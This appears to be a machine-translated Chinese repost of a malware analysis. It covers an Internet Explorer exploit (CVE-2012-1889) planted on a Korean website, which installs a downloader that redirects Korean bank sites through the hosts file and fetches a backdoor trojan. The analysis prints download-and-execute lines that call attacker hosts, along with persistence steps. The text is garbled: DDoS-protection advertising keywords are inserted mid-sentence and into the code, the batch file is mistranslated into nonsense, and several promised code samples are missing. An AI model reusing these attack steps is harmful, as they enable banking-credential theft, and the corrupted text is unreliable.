来自 资讯 2022-05-14 16:40 的文章

ddos盾_华云盾_零误杀

ddos盾_华云盾_零误杀

分析高防御加面板吗对韩国银行的攻击

在这篇博文中,我们将关注源自韩国的攻击hxxp://www.spc.or.kr/

该网站spc.or.kr是属于韩国软件产权委员会(spc)的合法韩国网站。打开站点并显示其源代码后,我们查看了包含的脚本/js/common1.js。这个脚本包括另外两个Javascript(第三个被注释掉)。当我们打开这两个脚本时,我们注意到在/js/screen1.js的末尾有一个可疑的iframe标记。这个iframe标签将我们带到了rootadmina2012.com,这是主要的攻击网站。

原始网站rootadmin2012.com包含以下三行代码:

前两项是iframe,其中包含heapspray和外壳代码,最后一个脚本标签是计数器,它告诉网络罪犯主攻击页面被执行了多少次。

在对1.html进行简要检查后,我们可以注意到一个具有有趣名称"外壳代码"

的变量,该变量在取消引用后,给出了以下外壳代码:

您可以注意到-Urlmon中的可见文本字符串,这是一个用于internet通信的windows库;C:\x.exe,文件名,下载的内容存储在其中并在以后执行;及,它包含另一个攻击阶段。

在观察cc.html后,我们可以注意到另一个有趣的字符串:

这让我们预感到此漏洞与Internet Explorer(ie)和堆喷洒(heaplib)有关。经过进一步搜索,我们能够确定此次攻击使用CVE-2012-1889(?name=CVE-2012-1889)漏洞,允许远程攻击者通过精心编制的网站执行任意代码。在cc.html和漏洞数据库的以下链接中搜索classid=f6D90f11-9c73-11d3-b32e-00C04f990bb4

需要注意的是,此攻击仅适用于禁用DEP(数据执行预防)的计算机。如果在启用DEP的计算机上运行此攻击,将显示以下消息

文件sun.exe是第二级下载程序,大小为15KB,用Visual Basic编写。它具有与Microsoft Word文档相同的图标。

下载时,它执行以下任务:

1)通过从naver.net下载图像检查互联网连接,naver.net是韩国搜索引擎

URLDownloadToFileA("http://static.naver.net/w9/blank.gif","c:\ntldrs\Isinter.gif")如果(sizeOfFile("c:\ntldrs\Isinter.gif")>0,防ddos防御,则删除"c:/ntldrs/Isinter.gif"

2)下载URL下载文件("http://myadmin2012.com/sun.txt","c:\ntldrs\system.yf")

然后将其附加到主机文件c:\WINDOWS\system32\drivers\etc\hosts中。只要用户访问上述属于韩国银行的任何网站,他/她就会被重定向到126.114.224.53(Softbank 126114224053.bbtec.net),这是一个位于日本的服务器。

3)在""C:\Program Files\Internet Explorer\IEXPLORE.EXE"。

tong.htm包含

这是另一个计数器的脚本,它告诉攻击者下载下载程序的次数。

4)使其自身持久化(在计算机重新启动等情况下)

它通过添加名为"skunser"的值和数据"C:\ntldrs\svchest.exe"来修改Software\Microsoft\Windows\CurrentVersion\Run注册表项,大规模ddos攻击防御,山石防火墙防御内网ddos,该值以前复制了自身。

5)它下载一个后门文件,

---------------------------------------------------------------------------URL下载文件("http://www.hisunpharm.com/files/File/product/pao.exe",ddos攻击防御软件下载,"C:\Program Files\tongji2.exe")---------------------------------------------------------------------------

存储到tongji2.exe中,并执行。Tongji2是一个后门文件,它试图连接到由网络罪犯控制的另一个网站。

6)它删除并执行以下批处理文件,该批处理文件计划每30分钟启动一次下载程序。"在XX:XX/interactive"确保svchest.exe以高于管理员权限的本地系统权限(在WinXP上)启动。

---------------------------------------------------------------------------@回音schtasks/delete/tn*/fsc配置计划开始=自动net启动"任务调度器"0:00时/交互式c:/ntldrs/svchest.exe0:30时/c:/ntldrs/svchest.exe1:00/交互式c:/ntldrs/svchest.exe1:30/交互式c:/ntldrs/svchest.exe...24:30/交互式c:/ntldrs/svchest.exe删除%0---------------------------------------------------------------------------

攻击的第三阶段是主tongji2.exe模块。

该模块是一个大小约为1.3M的可执行文件,用Delphi编写,使用Safengine打包。从动态分析中,我们可以观察到,在执行之后,它会将自身注入iexplore.exe,以减少未经培训的计算机用户的怀疑。然后,它尝试通过自定义通信协议启动连接。接收到的消息由一个简单的xor循环解密。然后,根据接收到的消息的内容,它选择从许多内置功能中执行一个,例如,下载文件、重新启动计算机、读取剪贴板、读取注册表、读取系统信息和许多其他功能。我们可以将其归类为后门特洛伊木马和infostrealer,后者允许攻击者控制受损的计算机。它还尝试连接到oray.com的免费中文网络主机laoding521.eicp.net端口889.eicp.net。

让我们看看修改主机文件的后果。在上面的屏幕截图中,我们展示了hosts文件的修改方式,即IP地址后面跟着一个韩国银行的URL地址。同样的情况不止一次发生在几家韩国银行。我们将向您展示昆敏银行(KBStar)的一个示例。在下面的截图中,您可以看到原始的KBStar网页。注意左上角的红色椭圆形。它显示http、http安全,通信是加密的,因此银行客户输入和发送的所有数据在发送之前都是加密的。